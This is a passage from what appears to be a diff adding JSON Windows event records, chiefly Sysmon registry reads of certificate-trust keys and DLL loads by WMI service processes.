"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + "image_name": "ktmw32.dll", + "image_path": "C:\\Windows\\System32\\ktmw32.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479790000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "resutils.dll", + "image_path": "C:\\Windows\\System32\\resutils.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479790000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "resutils.dll", + "image_path": "C:\\Windows\\System32\\resutils.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479790000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + "image_name": "wbemcomn.dll", + "image_path": "C:\\Windows\\System32\\wbemcomn.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573481670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\WmiApSrv.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Wbem", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Wbem\\CIMOM", + "registry_value": "CIMOM", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 7720, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\WmiApSrv.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Wbem", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Wbem\\CIMOM", + "registry_value": "CIMOM", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573481830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 